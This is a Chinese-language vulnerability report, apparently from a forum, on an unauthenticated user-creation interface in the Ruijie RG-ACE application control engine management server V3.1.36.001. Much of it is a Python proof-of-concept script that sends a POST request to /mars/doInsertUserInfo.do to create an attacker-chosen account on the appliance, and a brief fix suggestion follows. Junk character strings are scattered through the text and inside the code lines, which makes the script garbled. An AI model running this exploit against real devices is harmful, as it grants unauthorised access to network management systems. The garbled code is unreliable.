锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
) g( i; O( [" m- x) O

5 t' P/ ]2 ^& Y' t8 q! X' k. [测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
% a& B8 f0 i5 _) \7 }4 j2 O编译时间: 201104291730
" |, M/ t+ V8 C+ ?& D
$ c8 T8 I! c; r# D. P- F
漏洞证明：
' S+ a2 |- C  k/ d# I) L3 D


+ V* B9 |- `) {% c1 S/ T+ r

9 \/ c2 L- R4 j0 X5 \$ E" ]
执行脚本
' Q8 Y( i5 [* s, R#! /usr/bin/env python
2 C2 _& F) ?5 t% n) U3 V#coding=gbk
( _, X/ h9 h( J' W! d#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
7 N* o' P4 X) T2 V3 Wurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
, v; f6 l' Y. I* ^! J/ @opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
4 b, ^# p4 Q1 W0 v! Zopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
, R; `6 ^+ _% G/ k3 w("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
% ?( y# x  W3 j$ P4 E8 Q- C% v("mobilePhone",""),
. i$ I5 }9 ]1 [("officePhone",""),
("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
3 n/ d# B) W8 j1 k& h+ Hp=urllib2.urlopen(url, urllib.urlencode(post)).read()
/ i% o+ d; d2 C/ Rprint "Done"

登录，连接设备





默认的管理员admin权限更大点

9 {! h  N4 ^* b# D" z

1 y5 ]; n2 ?8 m9 N# E4 ~
* J( k1 D+ b' D0 D- s/ P
修复方案：
加强对接口的权限验证